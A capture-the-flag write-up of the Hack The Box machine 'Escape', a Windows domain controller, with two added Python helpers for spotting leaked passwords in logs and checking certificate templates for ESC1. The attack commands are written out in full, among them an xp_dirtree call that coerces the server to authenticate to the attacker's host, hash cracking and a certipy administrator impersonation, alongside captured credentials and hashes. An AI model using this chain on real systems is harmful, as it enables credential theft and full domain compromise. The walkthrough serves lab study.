Escape

Emil Pawlak
Aspiring Pentester | SOC Analyst | Web Developer

Enumeration

I ran my favorite nmap commands on the provided IP.

nmap scan results
Nmap scan report for 10.129.19.47
Host is up (0.028s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-04-06 22:57:49Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2026-04-06T22:59:14+00:00; +8h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-04-06T22:59:13+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2026-04-06T22:59:14+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-04-06T22:55:27
|_Not valid after:  2056-04-06T22:55:27
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2026-04-06T22:59:14+00:00; +8h00m00s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-04-06T22:59:13+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019
Aggressive OS guesses: Windows Server 2019 (97%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-04-06T22:58:34
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.48 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-06 16:59 CEST
Nmap scan report for 10.129.19.47
Host is up (0.029s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49689/tcp open  unknown
49690/tcp open  unknown
49711/tcp open  unknown
49720/tcp open  unknown
49741/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 105.05 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-06 17:01 CEST
Nmap scan report for 10.129.19.47
Host is up (0.029s latency).
Not shown: 996 open|filtered udp ports (no-response)
PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

We can see a number of Active Directory related ports open, which tells us the target is a domain controller. The output also gives the domain name and the DC name, sequel.htb and dc.sequel.htb, which I add to /etc/hosts. Two details in the scan are worth remembering for later: the clock skew of about 8 hours against my scanner (Kerberos rejects requests from clients that are more than 5 minutes off, so anything Kerberos-based will need a time sync first), and SMB message signing being "enabled and required", which rules out relaying a captured NTLM authentication to SMB. I will start from enumerating DNS.

DNS

For enumerating DNS I like to run a number of dig commands, asking about the zone itself (sequel.htb) rather than the host record, since NS, SOA and MX records live at the zone apex. I start with the name servers, dig @sequel.htb sequel.htb NS, then dig @sequel.htb sequel.htb SOA for basic information about the zone, and the mail server with dig @sequel.htb sequel.htb MX. I also like to check TXT and ANY for some left-over data. At the end I test for a zone transfer with dig @sequel.htb sequel.htb AXFR (a zone transfer is an AXFR query; SOA only tells you who is authoritative).

I also try to enumerate all domains and subdomains to make sure that I don't miss anything. dig's output is pretty messy, but it's good to practice working with it.

SMB

I found no new data with DNS, so let's look for some easy data with a null SMB session. Unfortunately there isn't anonymous access to it. I also ran sudo ntpdate sequel.htb just to make sure it isn't failing because of the time skew.

Seeing as the domain is named "sequel", maybe there is a "prequel" or other subdomains in general. I will check that in a second; first I want to enumerate users on the domain. It can be done with netexec smb 10.129.19.47 -u 'guest' -p '' --rid-brute, but it looks like the guest account is disabled.
PS: It was enabled; maybe uppercase would have helped, or there was some setting that didn't allow it to work. Admittedly, I didn't look deeply into that.

Background scanning

For subdomains, I would usually run something like ffuf -u http://sequel.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.sequel.htb" in the background, but ffuf is an HTTP fuzzer: it needs a web server to send the Host header to, and this box exposes none, so it won't fly. gobuster dns -d sequel.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt, on the other hand, queries DNS directly. It's slower but it does the job.

Background subdomain bruteforce found no new domains.

LDAP

I can check if I can scoop some data with some anonymous ldapsearch queries. I ran ldapsearch -x -H ldap://10.129.19.47 -b "DC=sequel,DC=htb", but it looks like LDAP requires credentials to bind and serve me information. RPC similarly denies me entry when I try a null session: rpcclient -U '' -N 10.129.19.47 (the empty -U '' is what makes it a null session; without it rpcclient would treat the next argument as the username).

Interesting how little information I found; I actually double-checked my connection to make sure all was working well. Of the interesting services on the open ports I hadn't yet checked out MSSQL, but I don't think there is any anonymous or null authentication for it. Funny how the box name is "Escape" but I can't "Enter" it so far. WinRM (WS-Man) and ADWS are similar: they require credentials to be useful.

Foothold

I went back over my steps and noticed that I had typed the smbclient flags in the wrong order. Previously I ran smbclient -L -N //10.129.228.253/, but the correct placement is smbclient -N -L //10.129.228.253/. The reason is that -L takes the host to list as its argument, so in the first form -N is swallowed as the host name and the listing never happens.

With smbmap -H 10.129.228.253 -u 'anonymous' -p '' I can see that the only shares readable by me are IPC$ and Public. In the Public share we can find a "SQL Server Procedures.pdf" file, which I downloaded to my host. I can't run ls inside IPC$, but that is expected: IPC$ is the named-pipe share used for RPC, not a file share, so there is nothing to list there. The pdf holds information about previous incidents in the company related to insecure practices with their SQL servers. From the pdf we get a step-by-step guide on how to access the database, the command to do so, basic credentials and a number of users mentioned. There is also an email address, so we know the naming structure if it comes to some sort of bruteforcing.

Users:
Ryan
Tom
Brandon (Brandon.Brown@sequel.com)

Credentials: PublicUser:GuestUserCantWrite1

The guide says to use cmdkey /add:"<serverName>.sequel.htb" /user:"sequel\<username>" /pass:<password>, which is a Windows command for storing credentials. I'm fairly certain that I can just plug them into mssqlclient.py from impacket: impacket-mssqlclient PublicUser:GuestUserCantWrite1@10.129.228.253 (no -windows-auth, since PublicUser is a SQL login rather than a domain account).

MSSQL

I managed to authenticate to the SQL Server. I checked what databases are there with:

SQL (PublicUser  guest@master)> SELECT name FROM sys.databases;
name     
------   
master   
tempdb   
model    
msdb   

Later, I enumerated the MSSQL instance with these basic commands:

  1. Switch to a database - USE master
  2. List databases - SELECT name FROM master.dbo.sysdatabases
  3. List the tables in the current database - SELECT table_name FROM master.INFORMATION_SCHEMA.TABLES (then SELECT * FROM <table> to read the data)

But I didn't find anything useful. I went through my other notes and tried to use xp_cmdshell, read files and impersonate other users that I had found before, but none of it led to any privilege escalation. I searched further and with SELECT srvname, isremote FROM sysservers I found out that there is another SQL server. Judging by the context, this is the DC mock-up mentioned in the PDF. Sadly EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [DC\SQLMOCK] shows that my current user has insufficient permissions to query it.

As there is no one I can impersonate and my user lacks permissions, I will look for some password reuse. I checked with netexec what PublicUser can do. It showed that it could authenticate to LDAP, but after trying it out with ldapsearch it seems that even though it binds correctly, it is denied permission to read anything.

Looking through my other notes for MSSQL I found that there is a way to catch the SQL Server's NTLMv2 hash with responder, so I tried that. I ran responder -i tun0 and then in MSSQL EXEC master..xp_dirtree '\\10.10.15.189\random' to trick it into authenticating to my host. This worked and I caught the hash. Note whose hash it is: xp_dirtree makes the SQL Server process open the UNC path, so the authentication comes from the service account running MSSQL (sql_svc), not from the low-privileged PublicUser login I am using. Since SMB signing is required on the DC, relaying this authentication is not an option, so cracking it is the way forward.

Loot:
[SMB] NTLMv2-SSP Client   : 10.129.228.253
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:2d7a260b829dfd6c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

I copied the NTLMv2 hash into a file and ran it against rockyou with hashcat sql_svc.hash /usr/share/wordlists/rockyou.txt (NetNTLMv2 is hashcat mode 5600; recent hashcat versions detect it from the line format, otherwise add -m 5600). With that, I cracked it - sql_svc:REGGIE1234ronnie

Privilege Escalation

Now, as sql_svc, I want to check what I can authenticate to. I grew a bit tired of running a few separate netexec commands so I created a simple loop for that: for p in smb winrm mssql; do netexec $p 10.129.228.253 -u 'sql_svc' -p 'REGGIE1234ronnie'; done PS: I actually created a small bash script for this, you can find it here :)

I noticed that, interestingly, sql_svc has access to WinRM, which I didn't expect for a service account. I used evil-winrm and successfully authenticated to the host. I started to manually enumerate the user's files but didn't find anything useful there: no creds, no user flag and nothing of note in AppData. Next I listed the user profiles on the host.

d-----         2/7/2023   8:58 AM                Administrator
d-r---        7/20/2021  12:23 PM                Public
d-----         2/1/2023   6:37 PM                Ryan.Cooper
d-----         2/7/2023   8:10 AM                sql_svc

Going down into the root of C:\ I saw the "SQLServer" folder and entered it. I looked around and downloaded any log, config or generally interesting files to my machine so I could go through them in search of leaks, mentioned vulnerabilities, custom scripts or software versions.

One of those files was ERRORLOG.BAK, which on further inspection shows that the user Ryan.Cooper tried but failed to authenticate to the SQL server. Right after that attempt there is this line: 2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1] The "username" here is clearly not an account name; the user, likely by accident, typed their password into the username field, and SQL Server faithfully logged it in clear text. That gives us Ryan.Cooper:NuclearMosquito3
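This is a pattern worth turning into a detection, whether you are grepping a downloaded ERRORLOG as an attacker or watching SQL logon failures as a defender. Below is an added example, my own code rather than anything from the original writeup: it parses ERRORLOG-style "Logon failed" lines and pairs a failed logon for a known account with a failed logon for an unknown "user" from the same client within a short window, which is the signature of a password typed into the username field. The log lines are constructed to match the format quoted above; the known-account list is an assumption standing in for whatever user enumeration has produced.

```python
import re
from datetime import datetime, timedelta

# Matches the SQL Server ERRORLOG logon-failure format quoted in the writeup.
LOGON_FAIL = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)


def find_leaked_passwords(log_text: str, known_logins, window=timedelta(seconds=60)):
    """Return (account, probable_password) pairs.

    A failed logon for a name that is not a known account, coming from the same
    client within `window` of a failed logon for a known account, is treated as
    that account's password typed into the wrong field.
    """
    known = {k.lower() for k in known_logins}
    last_known_fail = {}  # client -> (timestamp, account)
    hits = []
    for line in log_text.splitlines():
        m = LOGON_FAIL.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
        user, client = m["user"], m["client"]
        if user.lower() in known:
            last_known_fail[client] = (ts, user)
            continue
        prev = last_known_fail.get(client)
        if prev and timedelta(0) <= ts - prev[0] <= window:
            hits.append((prev[1], user))
    return hits


# Constructed sample log, modelled on the ERRORLOG line format (not real box data).
SAMPLE_LOG = r"""
2022-11-18 13:43:05.21 Logon       Logon failed for user 'sequel\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:44:10.00 Logon       Logon failed for user 'sequel\sql_svc'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2022-11-18 13:50:00.00 Logon       Logon failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2022-11-18 14:30:00.00 Logon       Logon failed for user 'NotAPassword'. Reason: Could not find a login matching the name provided. [CLIENT: 10.10.14.5]
"""

# Assumed to come from user enumeration (PDF, RID brute force, LDAP); hypothetical list.
KNOWN_LOGINS = {r"sequel\Ryan.Cooper", r"sequel\sql_svc", "sa", "PublicUser"}

if __name__ == "__main__":
    for account, password in find_leaked_passwords(SAMPLE_LOG, KNOWN_LOGINS):
        print(f"possible credential: {account}:{password}")
```

The 14:30 line is not reported because it falls outside the window of the last known-account failure from that client; tighten or widen the window to taste, and feed the same logic Windows event 4625 or 18456 entries from a SIEM for the defensive version.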

Similarly to sql_svc, I ran netexec and looked at what I could access with the new user. Seeing that I could access the host via WinRM, I did just that. Looking at the user's files I found the user flag on the Desktop and began to look for further privilege escalation vectors. I enumerated the AppData folder, looked for custom scripts, ran whoami /all and generally did a basic lookup of what I could do as the user.

WinPEAS

Not finding any low-hanging fruit, I decided to download and run WinPEAS as well as enumerate the domain with bloodhound-python and rusthound. Below are some interesting parts of WinPEAS output which I decided to note.

Promising winPEAS output
╔══════════╣ Enumerating Named Pipes
  Name                                                                                                 CurrentUserPerms                                                       Sddl
  eventlog                                                                                             Everyone [Allow: WriteData/CreateFiles]                                O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)
  MSSQL$SQLMOCK\sql\query                                                                              Everyone [Allow: WriteData/CreateFiles]                                O:S-1-5-21-4078382237-1492182817-2568127209-1106G:DUD:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-4078382237-1492182817-2568127209-1106)
  ROUTER                                                                                               Everyone [Allow: WriteData/CreateFiles]                                O:SYG:SYD:P(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;SY)
  RpcProxy\49689                                                                                       Everyone [Allow: WriteData/CreateFiles]                                O:BAG:SYD:(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;BA)
  RpcProxy\593                                                                                         Everyone [Allow: WriteData/CreateFiles]                                O:NSG:NSD:(A;;0x12019b;;;WD)(A;;RC;;;OW)(A;;0x12019b;;;AN)(A;;FA;;;S-1-5-80-521322694-906040134-3864710659-1525148216-3451224162)(A;;FA;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)
  SQLLocal\SQLMOCK                                                                                     Everyone [Allow: WriteData/CreateFiles]                                O:S-1-5-21-4078382237-1492182817-2568127209-1106G:DUD:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-4078382237-1492182817-2568127209-1106)
  vgauth-service                                                                                       Everyone [Allow: WriteData/CreateFiles]                                O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)
---
MinPasswordLength: 7
---
╔══════════╣ Autorun Applications
╚ Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html
Folder: C:\Users\Ryan.Cooper\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
	FolderPerms: Ryan.Cooper [Allow: AllAccess]
	File: C:\Users\Ryan.Cooper\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini (Unquoted and Space detected) - C:\Users\Ryan.Cooper\AppData\Roaming\Microsoft\Windows
	FilePerms: Ryan.Cooper [Allow: AllAccess]
	Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787
---
If you can modify a template (WriteDacl/WriteOwner/GenericAll), you can abuse ESC4
  Dangerous rights over template: User  (Rights: WriteProperty,ExtendedRight)
  Dangerous rights over template: UserSignature  (Rights: WriteProperty,ExtendedRight)
  Dangerous rights over template: ClientAuth  (Rights: WriteProperty,ExtendedRight)
  Dangerous rights over template: EFS  (Rights: WriteProperty,ExtendedRight)
  Dangerous rights over template: UserAuthentication  (Rights: WriteProperty,ExtendedRight)
  [*] Tip: Abuse with tools like Certipy (template write -> ESC1 -> enroll).

  1. The named pipes seen above looked like a possible priv-esc, but from what I gathered, without impersonation, a SYSTEM/Administrator owner or "Full Control" permissions it likely won't do much.
  2. I noted that the minimum password length was 7 characters in case of a need to bruteforce.
  3. I noticed a potentially sensitive file mentioned in an autorun application, but similarly to the named pipes, it didn't involve any highly privileged user, so it would likely not help much.
  4. The last part I noted was information about dangerous rights over a few certificate templates (so AD CS), which could be interesting. I had some experience with those and I have a bad habit of forgetting to enumerate this vector with certipy.

I kept a mental note of the aforementioned vectors and judging by my gut feeling of how successful they might be I decided to focus on the ADCS path of attack.

bloodhound-python & rusthound

Before I did anything though, I still wanted to see what BloodHound could show me, as I could very easily have missed some group rights or permissions. Also, it's easy to get data from BloodHound, and it will come in handy when building certipy commands.

I ran my BloodHound collection with bloodhound-python -u Ryan.Cooper -p 'NuclearMosquito3' -d sequel.htb -dc dc.sequel.htb -ns 10.129.228.253 -c all; rusthound-ce -d sequel.htb -u Ryan.Cooper -p 'NuclearMosquito3' --zip -c All --ldaps, getting the general data from bloodhound-python and the additional certificate data that rusthound covers, and began to enumerate.

Certipy - ESC1

Admittedly, I didn’t find anything really useful, no additional paths of escalation. Because of that I decided to go with certipy.

I scanned the certificate templates with Ryan's credentials using certipy find -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -target-ip 10.129.228.253 -vulnerable -stdout, and from the output I noticed that the UserAuthentication template is vulnerable to ESC1 and that Ryan.Cooper is among the principals allowed to enroll in it. After double-checking with my notes from Authority, it checks all the required boxes for this to work. Said requirements are:

  1. Enrollee Supplies Subject = True (we get to put an arbitrary UPN, e.g. administrator, in the request)
  2. An EKU that allows authentication: Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose, or no EKU at all
  3. "Enrollment Rights" listing a group your user is a member of (here Domain Users)
  4. Requires Manager Approval = False
  5. Authorized Signatures Required = 0
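The same checklist as code, as an added example of mine rather than certipy's own logic or output: the function takes a template described with certipy-style field names (the dictionaries below are constructed samples, not the real certipy output for this box) and the set of principals the current user holds, and returns the list of ESC1 pre-conditions that fail. An empty list means the template is usable. It also adds the one condition the list above leaves implicit, that the template must actually be published (enabled) on a CA.

```python
# EKUs that make a certificate usable for Kerberos PKINIT / Windows client authentication.
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
             "Smart Card Logon", "Any Purpose"}


def esc1_blockers(template: dict, my_principals) -> list:
    """Return the ESC1 pre-conditions this template fails (empty list == exploitable)."""
    blockers = []
    if not template.get("Enrollee Supplies Subject", False):
        blockers.append("enrollee cannot supply the subject, so no arbitrary UPN")
    ekus = set(template.get("Extended Key Usage", []))
    if ekus and not ekus & AUTH_EKUS:  # an empty EKU list means the cert is good for any purpose
        blockers.append("no client-authentication EKU")
    if template.get("Requires Manager Approval", False):
        blockers.append("manager approval required")
    if template.get("Authorized Signatures Required", 0) != 0:
        blockers.append("authorized signatures required")
    mine = {p.lower() for p in my_principals}
    if not {p.lower() for p in template.get("Enrollment Rights", [])} & mine:
        blockers.append("none of my principals has enrollment rights")
    if not template.get("Enabled", True):
        blockers.append("template is not published on any CA")
    return blockers


def vulnerable_templates(templates: dict, my_principals) -> list:
    """Names of templates the given principals can abuse via ESC1, sorted."""
    return sorted(name for name, t in templates.items() if not esc1_blockers(t, my_principals))


# Constructed samples using certipy's field names; values are illustrative, not this box's real data.
TEMPLATES = {
    "UserAuthentication": {
        "Enabled": True,
        "Enrollee Supplies Subject": True,
        "Extended Key Usage": ["Client Authentication"],
        "Requires Manager Approval": False,
        "Authorized Signatures Required": 0,
        "Enrollment Rights": ["SEQUEL.HTB\\Domain Users", "SEQUEL.HTB\\Domain Admins"],
    },
    "User": {  # default User template: subject comes from AD, so no ESC1
        "Enabled": True,
        "Enrollee Supplies Subject": False,
        "Extended Key Usage": ["Client Authentication", "Secure Email", "Encrypting File System"],
        "Requires Manager Approval": False,
        "Authorized Signatures Required": 0,
        "Enrollment Rights": ["SEQUEL.HTB\\Domain Users"],
    },
    "Machine": {  # right settings, wrong enrollers
        "Enabled": True,
        "Enrollee Supplies Subject": True,
        "Extended Key Usage": ["Client Authentication", "Server Authentication"],
        "Requires Manager Approval": False,
        "Authorized Signatures Required": 0,
        "Enrollment Rights": ["SEQUEL.HTB\\Domain Computers"],
    },
    "WebServer": {  # no auth EKU and manager approval: two blockers
        "Enabled": True,
        "Enrollee Supplies Subject": True,
        "Extended Key Usage": ["Server Authentication"],
        "Requires Manager Approval": True,
        "Authorized Signatures Required": 0,
        "Enrollment Rights": ["SEQUEL.HTB\\Domain Users"],
    },
}

# Principals a low-privileged domain user holds; assumed, take yours from whoami /groups or BloodHound.
MY_PRINCIPALS = {"SEQUEL.HTB\\Ryan.Cooper", "SEQUEL.HTB\\Domain Users", "SEQUEL.HTB\\Authenticated Users"}

if __name__ == "__main__":
    for name, t in TEMPLATES.items():
        print(f"{name}: {esc1_blockers(t, MY_PRINCIPALS) or 'ESC1'}")
```

Once a template passes, the certipy request needs the CA name, the template name, the UPN you want to impersonate and, on patched DCs, the target account's SID for the strong certificate mapping; the enrollment-rights check is the one that most often trips people up, so compare it against the groups in whoami /groups rather than assuming Domain Users.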

So, I began to stitch together a certipy command. I ran it with -debug a few times, as I never manage to run it correctly on the first try, and came back with this one: certipy req -u 'Ryan.Cooper@sequel.htb' -p 'NuclearMosquito3' -dc-ip '10.129.228.253' -target 'dc.sequel.htb' -ca 'sequel-DC-CA' -template 'UserAuthentication' -upn 'administrator@sequel.htb' -sid 'S-1-5-21-4078382237-1492182817-2568127209-1105' -dc-host dc.sequel.htb -target-ip 10.129.228.253. The -sid flag matters on patched domain controllers: it embeds the administrator's SID in the certificate so the DC's strong certificate mapping (the KB5014754 change) still accepts it, and the SID is one of the things BloodHound hands you for free. Small rant: My god is certipy's syntax annoying to follow. It feels like I need to repeat the same thing three times in one command.

Anyway, I got the administrator.pfx file, which is a bundle of the certificate and its private key. I used it to authenticate as administrator via PKINIT so that I could get a TGT and, from it, the NTLM hash: certipy auth -pfx administrator.pfx -dc-ip 10.129.228.253. I also had to fix my time skew first, so I ran sudo ntpdate 10.129.228.253 (this is the 8-hour skew nmap flagged at the start), and below is the loot:

Loot:
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

With this information the box is really solved. Now I just had to pick a way and a tool to authenticate as an administrator. I decided to use Kerberos as I’m a bit less familiar with it than NTLM.

I checked if I had any other kerberos tickets saved up in my cache as a good practice:

azaeir@parrot (~): echo $KRB5CCNAME                                 

azaeir@parrot (~): klist
klist: No credentials cache found (filename: /tmp/krb5cc_1000)

Seeing as there isn't anything there, I pointed the KRB5CCNAME environment variable at the administrator.ccache I obtained (a relative path only works from the directory holding the file, so an absolute path is safer if you move around):

azaeir@parrot (~): export KRB5CCNAME=administrator.ccache     
azaeir@parrot (~): echo $KRB5CCNAME                                         
administrator.ccache

And authenticated to the host with psexec.py -k -no-pass sequel.htb/administrator@dc.sequel.htb. Note that with Kerberos the target has to be the DC's FQDN (dc.sequel.htb), which is why the /etc/hosts entry from the start and the time sync both matter here. I found the root flag on the Administrator's desktop.

Closing Thoughts

Escape is a great machine covering basic network enumeration, intermediate knowledge of MSSQL attack vectors and escalation through AD CS. It doesn't show any niche techniques or obscure vulnerabilities, but it provides some great fundamental challenges with a seamless and intuitive attack path.

It was a good box to sharpen some core elements of a pentester's methodology, with little to no curve-balls, which I do appreciate.